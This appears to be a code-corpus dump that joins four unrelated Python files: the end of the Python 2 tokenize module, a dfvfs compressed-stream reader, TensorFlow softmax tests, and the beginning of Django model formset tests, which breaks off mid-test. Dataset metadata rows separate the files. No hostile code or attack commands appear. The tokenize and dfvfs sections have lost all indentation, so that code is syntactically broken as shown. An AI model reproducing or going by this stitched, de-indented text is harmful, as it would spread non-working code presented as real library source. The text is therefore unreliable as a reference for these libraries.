Single3 = r"[^'\\]*(?:(?:\\.|'(?!''))[^'\\]*)*'''"
# Tail end of """ string.
Double3 = r'[^"\\]*(?:(?:\\.|"(?!""))[^"\\]*)*"""'
Triple = group("[uU]?[rR]?'''", '[uU]?[rR]?"""')
# Single-line ' or " string.
String = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*'",
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*"')
# Because of leftmost-then-longest match semantics, be sure to put the
# longest operators first (e.g., if = came before ==, == would get
# recognized as two instances of =).
Operator = group(r"\*\*=?", r">>=?", r"<<=?", r"<>", r"!=",
r"//=?",
r"[+\-*/%&|^=<>]=?",
r"~")
Bracket = '[][(){}]'
Special = group(r'\r?\n', r'[:;.,`@]')
Funny = group(Operator, Bracket, Special)
PlainToken = group(Number, Funny, String, Name)
Token = Ignore + PlainToken
# First (or only) line of ' or " string.
ContStr = group(r"[uU]?[rR]?'[^\n'\\]*(?:\\.[^\n'\\]*)*" +
group("'", r'\\\r?\n'),
r'[uU]?[rR]?"[^\n"\\]*(?:\\.[^\n"\\]*)*' +
group('"', r'\\\r?\n'))
PseudoExtras = group(r'\\\r?\n', Comment, Triple)
PseudoToken = Whitespace + group(PseudoExtras, Number, Funny, ContStr, Name)
tokenprog, pseudoprog, single3prog, double3prog = map(
re.compile, (Token, PseudoToken, Single3, Double3))
endprogs = {"'": re.compile(Single), '"': re.compile(Double),
"'''": single3prog, '"""': double3prog,
"r'''": single3prog, 'r"""': double3prog,
"u'''": single3prog, 'u"""': double3prog,
"ur'''": single3prog, 'ur"""': double3prog,
"R'''": single3prog, 'R"""': double3prog,
"U'''": single3prog, 'U"""': double3prog,
"uR'''": single3prog, 'uR"""': double3prog,
"Ur'''": single3prog, 'Ur"""': double3prog,
"UR'''": single3prog, 'UR"""': double3prog,
"b'''": single3prog, 'b"""': double3prog,
"br'''": single3prog, 'br"""': double3prog,
"B'''": single3prog, 'B"""': double3prog,
"bR'''": single3prog, 'bR"""': double3prog,
"Br'''": single3prog, 'Br"""': double3prog,
"BR'''": single3prog, 'BR"""': double3prog,
'r': None, 'R': None, 'u': None, 'U': None,
'b': None, 'B': None}
triple_quoted = {}
for t in ("'''", '"""',
"r'''", 'r"""', "R'''", 'R"""',
"u'''", 'u"""', "U'''", 'U"""',
"ur'''", 'ur"""', "Ur'''", 'Ur"""',
"uR'''", 'uR"""', "UR'''", 'UR"""',
"b'''", 'b"""', "B'''", 'B"""',
"br'''", 'br"""', "Br'''", 'Br"""',
"bR'''", 'bR"""', "BR'''", 'BR"""'):
triple_quoted[t] = t
single_quoted = {}
for t in ("'", '"',
"r'", 'r"', "R'", 'R"',
"u'", 'u"', "U'", 'U"',
"ur'", 'ur"', "Ur'", 'Ur"',
"uR'", 'uR"', "UR'", 'UR"',
"b'", 'b"', "B'", 'B"',
"br'", 'br"', "Br'", 'Br"',
"bR'", 'bR"', "BR'", 'BR"' ):
single_quoted[t] = t
tabsize = 8
class TokenError(Exception): pass
class StopTokenizing(Exception): pass
def printtoken(type, token, srow_scol, erow_ecol, line): # for testing
srow, scol = srow_scol
erow, ecol = erow_ecol
print "%d,%d-%d,%d:\t%s\t%s" % \
(srow, scol, erow, ecol, tok_name[type], repr(token))
def tokenize(readline, tokeneater=printtoken):
"""
The tokenize() function accepts two parameters: one representing the
input stream, and one providing an output mechanism for tokenize().
The first parameter, readline, must be a callable object which provides
the same interface as the readline() method of built-in file objects.
Each call to the function should return one line of input as a string.
The second parameter, tokeneater, must also be a callable object. It is
called once for each token, with five arguments, corresponding to the
tuples generated by generate_tokens().
"""
try:
tokenize_loop(readline, tokeneater)
except StopTokenizing:
pass
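# Small usage sketch (added for illustration, not part of the stdlib module):
# tokenizing an in-memory string by handing its readline to generate_tokens().
def _example_generate_tokens():
    from StringIO import StringIO
    source = "x = 1 + 2\n"
    for tok_type, tok_string, start, end, line in generate_tokens(StringIO(source).readline):
        print tok_name[tok_type], repr(tok_string)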
# backwards compatible interface
def tokenize_loop(readline, tokeneater):
for token_info in generate_tokens(readline):
tokeneater(*token_info)
class Untokenizer:
def __init__(self):
self.tokens = []
self.prev_row = 1
self.prev_col = 0
def add_whitespace(self, start):
row, col = start
assert row <= self.prev_row
col_offset = col - self.prev_col
if col_offset:
self.tokens.append(" " * col_offset)
def untokenize(self, iterable):
for t in iterable:
if len(t) == 2:
self.compat(t, iterable)
break
tok_type, token, start, end, line = t
self.add_whitespace(start)
self.tokens.append(token)
self.prev_row, self.prev_col = end
if tok_type in (NEWLINE, NL):
self.prev_row += 1
self.prev_col = 0
return "".join(self.tokens)
def compat(self, token, iterable):
startline = False
indents = []
toks_append = self.tokens.append
toknum, tokval = token
if toknum in (NAME, NUMBER):
tokval += ' '
if toknum in (NEWLINE, NL):
startline = True
prevstring = False
for tok in iterable:
toknum, tokval = tok[:2]
if toknum in (NAME, NUMBER):
tokval += ' '
# Insert a space between two consecutive strings
if toknum == STRING:
if prevstring:
tokval = ' ' + tokval
prevstring = True
else:
prevstring = False
if toknum == INDENT:
indents.append(tokval)
continue
elif toknum == DEDENT:
indents.pop()
continue
elif toknum in (NEWLINE, NL):
startline = True
elif startline and indents:
toks_append(indents[-1])
startline = False
toks_append(tokval)
def untokenize(iterable):
"""Transform tokens back into Python source code.
Each element returned by the iterable must be a token sequence
with at least two elements, a token number and token value. If
only two tokens are passed, the resulting output is poor.
Round-trip invariant for full input:
Untokenized source will match input source exactly
    Round-trip invariant for limited input:
        # Output text will tokenize back to the input
t1 = [tok[:2] for tok in generate_tokens(f.readline)]
newcode = untokenize(t1)
readline = iter(newcode.splitlines(1)).next
t2 = [tok[:2] for tok in generate_tokens(readline)]
assert t1 == t2
"""
ut = Untokenizer()
return ut.untokenize(iterable)
def generate_tokens(readline):
"""
    The generate_tokens() generator requires one argument, readline, which
must be a callable object which provides the same interface as the
readline() method of built-in file objects. Each call to the function
should return one line of input as a string. Alternately, readline
can be a callable function terminating with StopIteration:
readline = open(myfile).next # Example of alternate readline
The generator produces 5-tuples with these members: the token type; the
token string; a 2-tuple (srow, scol) of ints specifying the row and
column where the token begins in the source; a 2-tuple (erow, ecol) of
ints specifying the row and column where the token ends in the source;
and the line on which the token was found. The line passed is the
logical line; continuation lines are included.
"""
lnum = parenlev = continued = 0
namechars, numchars = string.ascii_letters + '_', '0123456789'
contstr, needcont = '', 0
contline = None
indents = [0]
while 1: # loop over lines in stream
try:
line = readline()
except StopIteration:
line = ''
lnum = lnum + 1
pos, max = 0, len(line)
if contstr: # continued string
if not line:
raise TokenError, ("EOF in multi-line string", strstart)
endmatch = endprog.match(line)
if endmatch:
pos = end = endmatch.end(0)
yield (STRING, contstr + line[:end],
strstart, (lnum, end), contline + line)
contstr, needcont = '', 0
contline = None
elif needcont and line[-2:] != '\\\n' and line[-3:] != '\\\r\n':
yield (ERRORTOKEN, contstr + line,
strstart, (lnum, len(line)), contline)
contstr = ''
contline = None
continue
else:
contstr = contstr + line
contline = contline + line
continue
elif parenlev == 0 and not continued: # new statement
if not line: break
column = 0
while pos < max: # measure leading whitespace
if line[pos] == ' ': column = column + 1
elif line[pos] == '\t': column = (column/tabsize + 1)*tabsize
elif line[pos] == '\f': column = 0
else: break
pos = pos + 1
if pos == max: break
if line[pos] in '#\r\n': # skip comments or blank lines
if line[pos] == '#':
comment_token = line[pos:].rstrip('\r\n')
nl_pos = pos + len(comment_token)
yield (COMMENT, comment_token,
(lnum, pos), (lnum, pos + len(comment_token)), line)
yield (NL, line[nl_pos:],
(lnum, nl_pos), (lnum, len(line)), line)
else:
yield ((NL, COMMENT)[line[pos] == '#'], line[pos:],
(lnum, pos), (lnum, len(line)), line)
continue
if column > indents[-1]: # count indents or dedents
indents.append(column)
yield (INDENT, line[:pos], (lnum, 0), (lnum, pos), line)
while column < indents[-1]:
if column not in indents:
raise IndentationError(
"unindent does not match any outer indentation level",
("<tokenize>", lnum, pos, line))
indents = indents[:-1]
yield (DEDENT, '', (lnum, pos), (lnum, pos), line)
else: # continued statement
if not line:
raise TokenError, ("EOF in multi-line statement", (lnum, 0))
continued = 0
while pos < max:
pseudomatch = pseudoprog.match(line, pos)
if pseudomatch: # scan for tokens
start, end = pseudomatch.span(1)
spos, epos, pos = (lnum, start), (lnum, end), end
token, initial = line[start:end], line[start]
if initial in numchars or \
(initial == '.' and token != '.'): # ordinary number
yield (NUMBER, token, spos, epos, line)
elif initial in '\r\n':
yield (NL if parenlev > 0 else NEWLINE,
token, spos, epos, line)
elif initial == '#':
assert not token.endswith("\n")
yield (COMMENT, token, spos, epos, line)
elif token in triple_quoted:
endprog = endprogs[token]
endmatch = endprog.match(line, pos)
if endmatch: # all on one line
pos = endmatch.end(0)
token = line[start:pos]
yield (STRING, token, spos, (lnum, pos), line)
else:
strstart = (lnum, start) # multiple lines
contstr = line[start:]
contline = line
break
elif initial in single_quoted or \
token[:2] in single_quoted or \
token[:3] in single_quoted:
if token[-1] == '\n': # continued string
strstart = (lnum, start)
endprog = (endprogs[initial] or endprogs[token[1]] or
endprogs[token[2]])
contstr, needcont = line[start:], 1
contline = line
break
else: # ordinary string
yield (STRING, token, spos, epos, line)
elif initial in namechars: # ordinary name
yield (NAME, token, spos, epos, line)
elif initial == '\\': # continued stmt
continued = 1
else:
if initial in '([{': parenlev = parenlev + 1
elif initial in ')]}': parenlev = parenlev - 1
yield (OP, token, spos, epos, line)
else:
yield (ERRORTOKEN, line[pos],
(lnum, pos), (lnum, pos+1), line)
pos = pos + 1
for indent in indents[1:]: # pop remaining indent levels
yield (DEDENT, '', (lnum, 0), (lnum, 0), '')
yield (ENDMARKER, '', (lnum, 0), (lnum, 0), '')
if __name__ == '__main__': # testing
import sys
if len(sys.argv) > 1: tokenize(open(sys.argv[1]).readline)
else: tokenize(sys.stdin.readline)
| gpl-2.0 | -3,449,478,419,062,740,500 | 38.339759 | 89 | 0.506554 | false |
log2timeline/dfvfs | dfvfs/file_io/compressed_stream_io.py | 2 | 9519 | # -*- coding: utf-8 -*-
"""The compressed stream file-like object implementation."""
import os
from dfvfs.compression import manager as compression_manager
from dfvfs.file_io import file_io
from dfvfs.lib import errors
from dfvfs.resolver import resolver
class CompressedStream(file_io.FileIO):
"""File input/output (IO) object of a compressed stream."""
# The size of the compressed data buffer.
_COMPRESSED_DATA_BUFFER_SIZE = 8 * 1024 * 1024
def __init__(self, resolver_context, path_spec):
"""Initializes a file input/output (IO) object.
Args:
resolver_context (Context): resolver context.
path_spec (PathSpec): a path specification.
"""
super(CompressedStream, self).__init__(resolver_context, path_spec)
self._compression_method = None
self._file_object = None
self._compressed_data = b''
self._current_offset = 0
self._decompressor = None
self._realign_offset = True
self._uncompressed_data = b''
self._uncompressed_data_offset = 0
self._uncompressed_data_size = 0
self._uncompressed_stream_size = None
def _Close(self):
"""Closes the file-like object.
    If the file-like object was passed in via the init function, the
    compressed stream file-like object does not control the file-like
    object and should not actually close it.
"""
self._compressed_data = b''
self._file_object = None
self._decompressor = None
self._uncompressed_data = b''
def _GetDecompressor(self):
"""Retrieves the decompressor.
Returns:
Decompressor: decompressor.
"""
return compression_manager.CompressionManager.GetDecompressor(
self._compression_method)
def _GetUncompressedStreamSize(self):
"""Retrieves the uncompressed stream size.
Returns:
int: uncompressed stream size.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
uncompressed_stream_size = 0
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
uncompressed_stream_size += self._uncompressed_data_size
return uncompressed_stream_size
def _Open(self, mode='rb'):
"""Opens the file-like object.
Args:
mode (Optional[str]): file access mode.
Raises:
AccessError: if the access to open the file was denied.
IOError: if the file-like object could not be opened.
OSError: if the file-like object could not be opened.
PathSpecError: if the path specification is incorrect.
"""
if not self._path_spec.HasParent():
raise errors.PathSpecError(
'Unsupported path specification without parent.')
self._compression_method = getattr(
self._path_spec, 'compression_method', None)
if self._compression_method is None:
raise errors.PathSpecError(
'Path specification missing compression method.')
self._file_object = resolver.Resolver.OpenFileObject(
self._path_spec.parent, resolver_context=self._resolver_context)
def _AlignUncompressedDataOffset(self, uncompressed_data_offset):
"""Aligns the compressed file with the uncompressed data offset.
Args:
uncompressed_data_offset (int): uncompressed data offset.
"""
self._file_object.seek(0, os.SEEK_SET)
self._decompressor = self._GetDecompressor()
self._uncompressed_data = b''
compressed_data_offset = 0
compressed_data_size = self._file_object.get_size()
while compressed_data_offset < compressed_data_size:
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
if read_count == 0:
break
compressed_data_offset += read_count
if uncompressed_data_offset < self._uncompressed_data_size:
self._uncompressed_data_offset = uncompressed_data_offset
break
uncompressed_data_offset -= self._uncompressed_data_size
def _ReadCompressedData(self, read_size):
"""Reads compressed data from the file-like object.
Args:
read_size (int): number of bytes of compressed data to read.
Returns:
int: number of bytes of compressed data read.
"""
compressed_data = self._file_object.read(read_size)
read_count = len(compressed_data)
self._compressed_data = b''.join([self._compressed_data, compressed_data])
self._uncompressed_data, self._compressed_data = (
self._decompressor.Decompress(self._compressed_data))
self._uncompressed_data_size = len(self._uncompressed_data)
return read_count
  # Note: the following functions do not follow the style guide
# because they are part of the file-like object interface.
# pylint: disable=invalid-name
def read(self, size=None):
"""Reads a byte string from the file-like object at the current offset.
The function will read a byte string of the specified size or
all of the remaining data if no size was specified.
Args:
size (Optional[int]): number of bytes to read, where None is all
remaining data.
Returns:
bytes: data read.
Raises:
IOError: if the read failed.
OSError: if the read failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size < 0:
raise IOError('Invalid uncompressed stream size.')
if self._current_offset >= self._uncompressed_stream_size:
return b''
if self._realign_offset:
self._AlignUncompressedDataOffset(self._current_offset)
self._realign_offset = False
if size is None:
size = self._uncompressed_stream_size
if self._current_offset + size > self._uncompressed_stream_size:
size = self._uncompressed_stream_size - self._current_offset
uncompressed_data = b''
if size == 0:
return uncompressed_data
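    # Accumulate uncompressed data chunk by chunk until the remaining number
    # of requested bytes fits within the current chunk or the end of the
    # compressed stream is reached.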
while size > self._uncompressed_data_size:
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[self._uncompressed_data_offset:]])
remaining_uncompressed_data_size = (
self._uncompressed_data_size - self._uncompressed_data_offset)
self._current_offset += remaining_uncompressed_data_size
size -= remaining_uncompressed_data_size
if self._current_offset >= self._uncompressed_stream_size:
break
read_count = self._ReadCompressedData(self._COMPRESSED_DATA_BUFFER_SIZE)
self._uncompressed_data_offset = 0
if read_count == 0:
break
if size > 0:
slice_start_offset = self._uncompressed_data_offset
slice_end_offset = slice_start_offset + size
uncompressed_data = b''.join([
uncompressed_data,
self._uncompressed_data[slice_start_offset:slice_end_offset]])
self._uncompressed_data_offset += size
self._current_offset += size
return uncompressed_data
def seek(self, offset, whence=os.SEEK_SET):
"""Seeks to an offset within the file-like object.
Args:
offset (int): offset to seek to.
      whence (Optional[int]): value that indicates whether offset is an absolute
or relative position within the file.
Raises:
IOError: if the seek failed.
OSError: if the seek failed.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._current_offset < 0:
raise IOError(
'Invalid current offset: {0:d} value less than zero.'.format(
self._current_offset))
if whence == os.SEEK_CUR:
offset += self._current_offset
elif whence == os.SEEK_END:
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
if self._uncompressed_stream_size is None:
raise IOError('Invalid uncompressed stream size.')
offset += self._uncompressed_stream_size
elif whence != os.SEEK_SET:
raise IOError('Unsupported whence.')
if offset < 0:
raise IOError('Invalid offset value less than zero.')
if offset != self._current_offset:
self._current_offset = offset
self._realign_offset = True
def get_offset(self):
"""Retrieves the current offset into the file-like object.
Returns:
int: current offset in the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
return self._current_offset
def get_size(self):
"""Retrieves the size of the file-like object.
Returns:
int: size of the uncompressed stream.
Raises:
IOError: if the file-like object has not been opened.
OSError: if the file-like object has not been opened.
"""
if not self._is_open:
raise IOError('Not opened.')
if self._uncompressed_stream_size is None:
self._uncompressed_stream_size = self._GetUncompressedStreamSize()
return self._uncompressed_stream_size
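# Illustrative usage sketch; compressed_stream_path_spec stands for a path
# specification (with compression_method and parent set) constructed with the
# dfvfs path specification factory:
#
#   file_object = resolver.Resolver.OpenFileObject(compressed_stream_path_spec)
#   uncompressed_data = file_object.read(4096)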
| apache-2.0 | -4,738,338,381,616,714,000 | 29.315287 | 80 | 0.668348 | false |
ppries/tensorflow | tensorflow/python/kernel_tests/softmax_op_test.py | 11 | 6928 | # Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Tests for SoftmaxOp and LogSoftmaxOp."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import sys
import numpy as np
import tensorflow as tf
class SoftmaxTest(tf.test.TestCase):
def _npSoftmax(self, features, dim=-1, log=False):
    if dim == -1:
dim = len(features.shape) - 1
one_only_on_dim = list(features.shape)
one_only_on_dim[dim] = 1
e = np.exp(features - np.reshape(
np.amax(
features, axis=dim), one_only_on_dim))
softmax = e / np.reshape(np.sum(e, axis=dim), one_only_on_dim)
if log:
return np.log(softmax)
else:
return softmax
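  # Worked example (consistent with testNpSoftmax below): for the row
  # [1., 2., 3., 4.] the max (4.) is subtracted, exp gives roughly
  # [0.0498, 0.1353, 0.3679, 1.], and dividing by the sum (~1.553) yields
  # approximately [0.0321, 0.0871, 0.2369, 0.6439].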
def _testSoftmax(self, np_features, dim=-1, log=False, use_gpu=False):
# A previous version of the code checked the op name rather than the op type
# to distinguish between log and non-log. Use an arbitrary name to catch
# this bug in future.
name = "arbitrary"
np_softmax = self._npSoftmax(np_features, dim=dim, log=log)
with self.test_session(use_gpu=use_gpu):
if log:
tf_softmax = tf.nn.log_softmax(np_features, dim=dim, name=name)
else:
tf_softmax = tf.nn.softmax(np_features, dim=dim, name=name)
out = tf_softmax.eval()
self.assertAllCloseAccordingToType(np_softmax, out)
self.assertShapeEqual(np_softmax, tf_softmax)
if not log:
# Bonus check: the softmaxes should add to one in dimension dim.
sum_along_dim = np.sum(out, axis=dim)
self.assertAllCloseAccordingToType(
np.ones(sum_along_dim.shape), sum_along_dim)
def _testAll(self, features):
self._testSoftmax(features, use_gpu=False)
self._testSoftmax(features, log=True, use_gpu=False)
self._testSoftmax(features, use_gpu=True)
self._testSoftmax(features, log=True, use_gpu=True)
self._testOverflow(use_gpu=True)
def testNpSoftmax(self):
features = [[1., 1., 1., 1.], [1., 2., 3., 4.]]
# Batch 0: All exps are 1. The expected result is
# Softmaxes = [0.25, 0.25, 0.25, 0.25]
# LogSoftmaxes = [-1.386294, -1.386294, -1.386294, -1.386294]
#
# Batch 1:
# exps = [1., 2.718, 7.389, 20.085]
# sum = 31.192
# Softmaxes = exps / sum = [0.0320586, 0.08714432, 0.23688282, 0.64391426]
# LogSoftmaxes = [-3.44019 , -2.44019 , -1.44019 , -0.44019]
np_sm = self._npSoftmax(np.array(features))
self.assertAllClose(
np.array([[0.25, 0.25, 0.25, 0.25],
[0.0320586, 0.08714432, 0.23688282, 0.64391426]]),
np_sm,
rtol=1.e-5, atol=1.e-5)
np_lsm = self._npSoftmax(np.array(features), log=True)
self.assertAllClose(
np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
[-3.4401897, -2.4401897, -1.4401897, -0.4401897]]),
np_lsm,
rtol=1.e-5, atol=1.e-5)
def _testOverflow(self, use_gpu=False):
    if use_gpu:
      dtype = np.float32
    else:
      dtype = np.float64
    max_value = np.finfo(dtype).max
    features = np.array(
        [[1., 1., 1., 1.],
         [max_value, 1., 2., 3.]]).astype(dtype)
    with self.test_session(use_gpu=use_gpu):
      tf_log_softmax = tf.nn.log_softmax(features)
      out = tf_log_softmax.eval()
      self.assertAllClose(
          np.array([[-1.386294, -1.386294, -1.386294, -1.386294],
                    [0, -max_value, -max_value, -max_value]]),
          out,
          rtol=1.e-5, atol=1.e-5)
def testFloat(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float32))
def testHalf(self):
self._testAll(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float16))
def testDouble(self):
self._testSoftmax(
np.array([[1., 1., 1., 1.], [1., 2., 3., 4.]]).astype(np.float64))
self._testOverflow()
  def test1DTensorAsInput(self):
self._testSoftmax(
np.array([3., 2., 3., 9.]).astype(np.float64), use_gpu=False)
self._testOverflow(use_gpu=False)
def test3DTensorAsInput(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongFirstDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=0,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testAlongSecondDimension(self):
self._testSoftmax(
np.array([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]]).astype(np.float32),
dim=1,
use_gpu=False)
self._testOverflow(use_gpu=False)
def testShapeInference(self):
op = tf.nn.softmax([[[1., 1., 1., 1.], [1., 2., 3., 4.]],
[[2., 3., 4., 5.], [6., 7., 8., 9.]],
[[5., 4., 3., 2.], [1., 2., 3., 4.]]])
self.assertEqual([3, 2, 4], op.get_shape())
def testEmptyInput(self):
with self.test_session():
x = tf.constant([[]], shape=[0, 3])
self.assertEqual(0, tf.size(x).eval())
# reshape would raise if logits is empty
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax(x, dim=0).eval()
def testDimTooLarge(self):
with self.test_session():
with self.assertRaises(tf.errors.InvalidArgumentError):
tf.nn.softmax([1., 2., 3., 4.], dim=100).eval()
def testLargeDims(self):
# Make sure that we properly handle large inputs. See
# https://github.com/tensorflow/tensorflow/issues/4425 for details
for dims in [129, 256]:
ones = np.random.rand(dims, dims).astype(np.float32)
np_softmax = self._npSoftmax(ones)
for use_gpu in [True, False]:
with self.test_session(use_gpu=use_gpu) as sess:
x = tf.placeholder(tf.float32)
y = tf.nn.softmax(x)
tf_softmax = sess.run(y, feed_dict={x: ones})
self.assertAllClose(tf_softmax, np_softmax)
if __name__ == "__main__":
tf.test.main()
| apache-2.0 | 3,633,917,365,880,471,600 | 35.083333 | 80 | 0.573326 | false |
vipul-sharma20/oh-mainline | vendor/packages/Django/tests/modeltests/model_formsets/tests.py | 51 | 61280 | from __future__ import absolute_import, unicode_literals
import datetime
import re
from datetime import date
from decimal import Decimal
from django import forms
from django.db import models
from django.forms.models import (_get_foreign_key, inlineformset_factory,
modelformset_factory)
from django.test import TestCase, skipUnlessDBFeature
from django.utils import six
from .models import (Author, BetterAuthor, Book, BookWithCustomPK,
BookWithOptionalAltEditor, AlternateBook, AuthorMeeting, CustomPrimaryKey,
Place, Owner, Location, OwnerProfile, Restaurant, Product, Price,
MexicanRestaurant, ClassyMexicanRestaurant, Repository, Revision,
Person, Membership, Team, Player, Poet, Poem, Post)
class DeletionTests(TestCase):
def test_deletion(self):
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': str(poet.pk),
'form-0-name': 'test',
'form-0-DELETE': 'on',
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
formset.save()
self.assertTrue(formset.is_valid())
self.assertEqual(Poet.objects.count(), 0)
def test_add_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '0',
'form-MAX_NUM_FORMS': '0',
'form-0-id': '',
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 0)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
def test_change_form_deletion_when_invalid(self):
"""
Make sure that an add form that is filled out, but marked for deletion
doesn't cause validation errors.
"""
PoetFormSet = modelformset_factory(Poet, can_delete=True)
poet = Poet.objects.create(name='test')
data = {
'form-TOTAL_FORMS': '1',
'form-INITIAL_FORMS': '1',
'form-MAX_NUM_FORMS': '0',
'form-0-id': six.text_type(poet.id),
'form-0-name': 'x' * 1000,
}
formset = PoetFormSet(data, queryset=Poet.objects.all())
# Make sure this form doesn't pass validation.
self.assertEqual(formset.is_valid(), False)
self.assertEqual(Poet.objects.count(), 1)
# Then make sure that it *does* pass validation and delete the object,
# even though the data isn't actually valid.
data['form-0-DELETE'] = 'on'
formset = PoetFormSet(data, queryset=Poet.objects.all())
self.assertEqual(formset.is_valid(), True)
formset.save()
self.assertEqual(Poet.objects.count(), 0)
class ModelFormsetTest(TestCase):
def test_simple_save(self):
qs = Author.objects.all()
AuthorFormSet = modelformset_factory(Author, extra=3)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" maxlength="100" /><input type="hidden" name="form-0-id" id="id_form-0-id" /></p>')
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" maxlength="100" /><input type="hidden" name="form-1-id" id="id_form-1-id" /></p>')
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '0', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-name': 'Charles Baudelaire',
'form-1-name': 'Arthur Rimbaud',
'form-2-name': '',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
saved = formset.save()
self.assertEqual(len(saved), 2)
author1, author2 = saved
self.assertEqual(author1, Author.objects.get(name='Charles Baudelaire'))
self.assertEqual(author2, Author.objects.get(name='Arthur Rimbaud'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1])
# Gah! We forgot Paul Verlaine. Let's create a formset to edit the
# existing authors with an extra form to add him. We *could* pass in a
# queryset to restrict the Author objects we edit, but in this case
# we'll use it to display them in alphabetical order by name.
qs = Author.objects.order_by('name')
AuthorFormSet = modelformset_factory(Author, extra=1, can_delete=False)
formset = AuthorFormSet(queryset=qs)
self.assertEqual(len(formset.forms), 3)
self.assertHTMLEqual(formset.forms[0].as_p(),
'<p><label for="id_form-0-name">Name:</label> <input id="id_form-0-name" type="text" name="form-0-name" value="Arthur Rimbaud" maxlength="100" /><input type="hidden" name="form-0-id" value="%d" id="id_form-0-id" /></p>' % author2.id)
self.assertHTMLEqual(formset.forms[1].as_p(),
'<p><label for="id_form-1-name">Name:</label> <input id="id_form-1-name" type="text" name="form-1-name" value="Charles Baudelaire" maxlength="100" /><input type="hidden" name="form-1-id" value="%d" id="id_form-1-id" /></p>' % author1.id)
self.assertHTMLEqual(formset.forms[2].as_p(),
'<p><label for="id_form-2-name">Name:</label> <input id="id_form-2-name" type="text" name="form-2-name" maxlength="100" /><input type="hidden" name="form-2-id" id="id_form-2-id" /></p>')
data = {
'form-TOTAL_FORMS': '3', # the number of forms rendered
'form-INITIAL_FORMS': '2', # the number of forms with initial data
'form-MAX_NUM_FORMS': '', # the max number of forms
'form-0-id': str(author2.id),
'form-0-name': 'Arthur Rimbaud',
'form-1-id': str(author1.id),
'form-1-name': 'Charles Baudelaire',
'form-2-name': 'Paul Verlaine',
}
formset = AuthorFormSet(data=data, queryset=qs)
self.assertTrue(formset.is_valid())
# Only changed or new objects are returned from formset.save()
saved = formset.save()
self.assertEqual(len(saved), 1)
author3 = saved[0]
self.assertEqual(author3, Author.objects.get(name='Paul Verlaine'))
authors = list(Author.objects.order_by('name'))
self.assertEqual(authors, [author2, author1, author3])
# This probably shouldn't happen, but it will. If an add form was
# marked for deletion, make sure we don't save that form.
qs = Author.objects.order_by('name')
